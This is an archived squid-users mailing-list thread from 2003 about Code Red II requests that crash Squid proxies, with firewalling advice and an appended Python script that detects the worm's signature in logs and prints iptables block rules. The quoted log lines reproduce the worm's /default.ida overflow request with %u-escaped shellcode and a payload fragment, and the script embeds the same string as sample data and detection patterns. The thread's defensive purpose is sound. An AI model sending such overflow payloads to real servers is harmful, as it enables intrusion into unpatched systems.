Re: [squid-users] parseHttpRequest: Unsupported Method 'somestrangestring'

From: Wei Keong <chooweikeong@dont-contact.us>
Date: Sat, 12 Apr 2003 10:22:53 +0800 (Singapore Standard Time)

Hi Ralf,

We have encountered this too. Please see Henrik's reply below...

Rgds,
Wei Keong

---------- Forwarded message ----------
Date: 04 Apr 2003 12:53:12 +0200
From: Henrik Nordstrom <hno@squid-cache.org>
To: Wei Keong <chooweikeong@pacific.net.sg>
Cc: squid-users@squid-cache.org
Subject: Re: [squid-users] New Code Red?

There is not much that can be done about this kind of problem except to
block the offending client stations by firewalling.

One thing which may make the "400 Bad Request" worse for Squid is that
these also get logged in detail in cache.log. If you cannot firewall the
user then you might want to change debug_options to

  debug_options ALL,1 33,0

to temporarily disable most error reporting on client side request
processing.

Regards
Henrik

Thu 2003-04-03 at 18.02 Wei Keong wrote:
> Hi,
>
> We are seeing a possible new Code Red. Each victim floods a
> particular destination. Unlike the original one, this one does not
> send a proper HTTP method. Although Squid will return Bad Request, this
> attack will consume a lot of resources and bring down the Squid box...
>
> Has anybody caught the same thing? It seems to us that DENIED/403
> requires less processing than returning NONE/400 or NONE/411. If this is
> true, is there any way to deny these requests?
>
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
> 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f
> f%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Conten
> t-length: 3379 ........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......GlobalAddAtomA
>
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
>
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
> 1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.x
> x..Content-type: text/xml.Content-length: 3379 ..Cache-Contr
> ol: max-stale=0........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......Global
>
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
>
>
> Thanks,
> Wei Keong

On Fri, 11 Apr 2003, Ralf Hildebrandt wrote:

> * mailinglists <mailinglists@belfin.ch>:
>
> > I got this here in my cache.log.
> > Squid 2.3stable4 is restarting upon it. I think it's some kind of attack.
> >
> > parseHttpRequest: Unsupported method 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> > 0%u531b%u53ff%u0078%u0000%u00=a'
>
> Looks like a buffer overrun attempt with shellcode
>
> --
> Ralf Hildebrandt (Im Auftrag des Referat V a) Ralf.Hildebrandt@charite.de
> Charite Campus Mitte Tel. +49 (0)30-450 570-155
> Referat V a - Kommunikationsnetze - Fax. +49 (0)30-450 570-916
> AIM: ralfpostfix
>
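Henrik's advice above is to firewall the offending client stations. The
cache.log line that mailinglists quoted ("parseHttpRequest: Unsupported
method '...'") carries no client address, so the access.log is what
identifies who to block. The following script is an added example written
for this archive page; it is not code from the thread or from the Squid
project. It assumes Squid 2.x native access.log layout (time elapsed client
code/status bytes method url ident hier type), cache.log lines of the form
"YYYY/MM/DD HH:MM:SS| message", a Linux host with iptables, and the default
proxy port 3128. Every log line in it is constructed for the example and
uses documentation IP ranges. It keys on the worm's own signature (the
/default.ida overflow and the %u-escaped sled quoted in the thread) rather
than on NONE/400 or NONE/411 alone, because ordinary broken clients also
produce 400s and a status-based block would catch them too.

```python
"""Flag Code Red II style requests in Squid logs and list clients to firewall.

Added example for the squid-users thread; not Squid code.  Assumed formats:
Squid 2.x native access.log and cache.log.  All sample lines are constructed.
"""
import re
from collections import Counter

# The %u-escaped sled/jump that opens the payload quoted in the thread
# (%u9090 decodes to two x86 NOPs); also matched when it lands in the
# method token of a split request, as in the cache.log line quoted above.
CRII_SHELLCODE = re.compile(r"%u9090%u6858%ucbd3%u7801", re.IGNORECASE)
# The .ida ISAPI overflow: /default.ida? followed by a long run of 'X'.
CRII_IDA = re.compile(r"/default\.ida\?X{20,}", re.IGNORECASE)

# Native access.log: time elapsed client code/status bytes method url ...
ACCESS_RE = re.compile(
    r"^(?P<time>\d+(?:\.\d+)?)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)
CACHELOG_RE = re.compile(
    r"^\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\| parseHttpRequest: "
    r"Unsupported method '(?P<method>[^']*)'"
)


def is_code_red(text):
    """True if a URL or method token carries the Code Red II signature."""
    return bool(CRII_IDA.search(text) or CRII_SHELLCODE.search(text))


def parse_access(line):
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def offending_clients(access_lines, threshold=3):
    """Count signature hits per client IP; return those at/over threshold."""
    hits = Counter()
    for line in access_lines:
        rec = parse_access(line)
        if rec and (is_code_red(rec["url"]) or is_code_red(rec["method"])):
            hits[rec["client"]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}


def cachelog_unsupported_methods(cache_lines):
    """Bogus method tokens from cache.log that carry the worm signature.
    cache.log has no client IP, so this only confirms what hits the proxy."""
    out = []
    for line in cache_lines:
        m = CACHELOG_RE.match(line)
        if m and is_code_red(m.group("method")):
            out.append(m.group("method"))
    return out


def firewall_rules(clients, chain="INPUT", port=3128):
    """iptables lines for the clients to block (assumed Linux, port 3128)."""
    return [f"iptables -I {chain} -s {ip} -p tcp --dport {port} -j DROP"
            for ip in sorted(clients)]


# Constructed sample data mirroring the shapes quoted in the thread.
SLED = "X" * 60
CRII_URL = (f"/default.ida?{SLED}%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3"
            "%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003"
            "%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_ACCESS = [
    f"1049975013.411 2 192.0.2.10 NONE/411 1234 GET {CRII_URL} - NONE/- -",
    f"1049975014.002 1 192.0.2.10 NONE/400 1301 GET http://198.51.100.5{CRII_URL} - NONE/- -",
    # overflow bytes landed where the method should be (split request)
    f"1049975015.119 3 192.0.2.10 NONE/400 1301 {SLED}%u9090%u6858%ucbd3%u7801%u00=a - - NONE/- -",
    "1049975016.500 120 192.0.2.20 TCP_MISS/200 5120 GET http://www.squid-cache.org/ - DIRECT/203.0.113.9 text/html",
    # harmless broken client: a 400, but no worm signature
    "1049975017.000 1 192.0.2.30 NONE/400 1100 GET http://example.com/%zz - NONE/- -",
    f"1049975018.250 2 192.0.2.40 NONE/400 1301 GET {CRII_URL} - NONE/- -",
]
SAMPLE_CACHELOG = [
    f"2003/04/11 10:22:53| parseHttpRequest: Unsupported method '{SLED}"
    "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u00=a'",
    "2003/04/11 10:23:01| parseHttpRequest: Unsupported method 'FOO'",
]

if __name__ == "__main__":
    bad = offending_clients(SAMPLE_ACCESS)
    print("worm tokens seen in cache.log:", len(cachelog_unsupported_methods(SAMPLE_CACHELOG)))
    print("clients over threshold:", bad)
    print("\n".join(firewall_rules(bad)))
```

Run it against a real access.log by replacing SAMPLE_ACCESS with the file's
lines; raise `threshold` on a busy proxy so that a single mis-sent request
does not get a station blocked, and keep in mind that an infected station
keeps scanning from the same address, so the count climbs quickly.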
Received on Fri Apr 11 2003 - 20:16:42 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:57 MST